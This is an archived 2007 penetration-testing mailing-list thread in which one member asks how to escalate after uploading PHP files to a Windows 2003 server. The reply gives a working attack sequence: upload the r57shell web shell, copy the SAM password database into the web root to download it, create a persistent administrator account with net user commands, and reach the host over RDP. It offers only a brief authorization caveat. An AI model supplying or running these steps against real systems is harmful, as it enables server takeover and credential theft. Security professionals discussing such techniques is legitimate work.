Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PHP Exploitation

From: "DokFLeed" <dokfleed () dokfleed net>
Date: Sun, 25 Nov 2007 11:12:24 +0400
I assume its for the good cause, and you are authorized to do so  ?!

Upload this to the server
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
encoded for Zend Optimizer
Or
http://no.spam.ee/~tonu/phpshell/r57shell.txt

Try the following commands:
=====================
1) To see whats running on system
   tasklist -SVC
2) To get a copy of the sam database
   copy C:\windows\repair\sam C:\www\sam.txt
   http://hostname/sam.txt
3) To add new user with username tested123 & password tested123
net user tested123 tested123 /add /active:yes /expires:never /passwordchg:yes /passwordreq:yes 
4) To make him Administrator
   net localgroup Administrators tested123 /add
5) Try to RDP to the server , if it is Firewalled!!
Download the RDP web front "Remote Desktop Connection Web Connection Software (455 KB)" 
Start IIS http://hostname /TSweb/
and log to Localhost

remember while testing, your imagination is your limitation:),
depending on your phpinfo output none of this might work, so you will have to code around it 

Dok
Smoke Dope, Eat Soap, Fly Home in a Bubble

==================
----- Original Message ----- From: "Danux" <danuxx () gmail com> 
To: <pen-test () securityfocus com>
Sent: Friday, November 23, 2007 6:29 AM
Subject: PHP Exploitation



Hi experts, i need your ideas,

By now, i am able to upload php files to a Windows 2003 Server, so i
can execute php code like phpinfo, but i cant execute passthru command
because of lack of IUSR_MACHINE privileges.
I have run some local php bof's without success.
Do you have another idea to break into the server through php code uploaded? 

Cheers!!!!!

--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------




------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: